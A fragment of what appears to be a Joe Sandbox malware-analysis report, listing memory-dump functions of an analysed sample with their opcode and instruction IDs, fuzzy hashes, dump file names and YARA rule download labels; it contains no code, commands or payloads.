                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 204415e583f59cf5bedaf2a59b8d9176dd2de0de399f6a684d0013ac4a56f3ec
                                                                                          • Instruction ID: 74bd79dc653401e66bd89c6808229dd4d2ad5f0e00cc43315ee3fb9931dd9820
                                                                                          • Opcode Fuzzy Hash: 204415e583f59cf5bedaf2a59b8d9176dd2de0de399f6a684d0013ac4a56f3ec
                                                                                          • Instruction Fuzzy Hash: 0271A070A08A8D8FDFA8EF58C855BE97BE1FF59310F10412AE84DC7291DB749985CB81
                                                                                          Function 00007FFD9B8B00A5 Relevance: .1, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d2e9f4d7ea2628f9ac72d7765e3d710c239ef18ca4280cc055cff12b30c82ac5
                                                                                          • Instruction ID: 7e8b761cd8473ecfa3bbc0f7e35a7bcec6b453c4254a60458d15f9cd8d4815bf
                                                                                          • Opcode Fuzzy Hash: d2e9f4d7ea2628f9ac72d7765e3d710c239ef18ca4280cc055cff12b30c82ac5
                                                                                          • Instruction Fuzzy Hash: 3D31ED30A1992D8FDBA9EB68C855AA9B3F1FF59300F5141E9D04DE3255CF34AA81CF40
                                                                                          Function 00007FFD9B8B3ADF Relevance: .1, Instructions: 86COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bf7646f7e1559e4964c0cd756fcaacd3b9362db68b21e2683031c4cc0c0add3b
                                                                                          • Instruction ID: 6be695adba7d8fb563bcc22bd73f7fa4f5e3e70f51e7f12d91228ef334924e0c
                                                                                          • Opcode Fuzzy Hash: bf7646f7e1559e4964c0cd756fcaacd3b9362db68b21e2683031c4cc0c0add3b
                                                                                          • Instruction Fuzzy Hash: AC312971D0452C8BEB68EF14D8A0BF9B3B1EB55304F4140AED04EA7285DE366E8ACF50
                                                                                          Function 00007FFD9B8B0D8E Relevance: .0, Instructions: 36COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 90b9aa3ad8e06a336b582e433a6d190dd403a74844dcc75b9cec6c989c53cc71
                                                                                          • Instruction ID: c07eda309402cfd6935b5cb7016e9ae5ba79b9eb25be75a40659dce04cba5eec
                                                                                          • Opcode Fuzzy Hash: 90b9aa3ad8e06a336b582e433a6d190dd403a74844dcc75b9cec6c989c53cc71
                                                                                          • Instruction Fuzzy Hash: 3BF0F970E1992DCECBA4EB68C8506FCB3B0FB5A304F4005AAC10DE7251DB359A81CF44
                                                                                          Function 00007FFD9B8B1279 Relevance: .0, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6e1887d1be01c89d690a864a3c95e18980f27101b7e57f81b6cf656047a9bc81
                                                                                          • Instruction ID: e8dcc36c8649a49f83377c11d86049a447dfbc4570d51bb6c94156aa53de8f1a
                                                                                          • Opcode Fuzzy Hash: 6e1887d1be01c89d690a864a3c95e18980f27101b7e57f81b6cf656047a9bc81
                                                                                          • Instruction Fuzzy Hash: BFF0F970E1952DCEDB64EB68C450AFCB3B0FB59304F4004A9C10DE3151CB359A81CF44
                                                                                          Function 00007FFD9B8B163D Relevance: .0, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1724388683.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8a0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 27f84774bcf1b1eeb2d2bff7c712cbabb01bd20ca02854db0b469abb770f434b
                                                                                          • Instruction ID: d022ea5b722f4bf736d74f5077a018b49549402f1f745c4517b7188105933b51
                                                                                          • Opcode Fuzzy Hash: 27f84774bcf1b1eeb2d2bff7c712cbabb01bd20ca02854db0b469abb770f434b
                                                                                          • Instruction Fuzzy Hash: 13F0A470E0992D8EDBA4EB68D850AECB3B1FB59305F4115AAC10DE3251DB359A858F44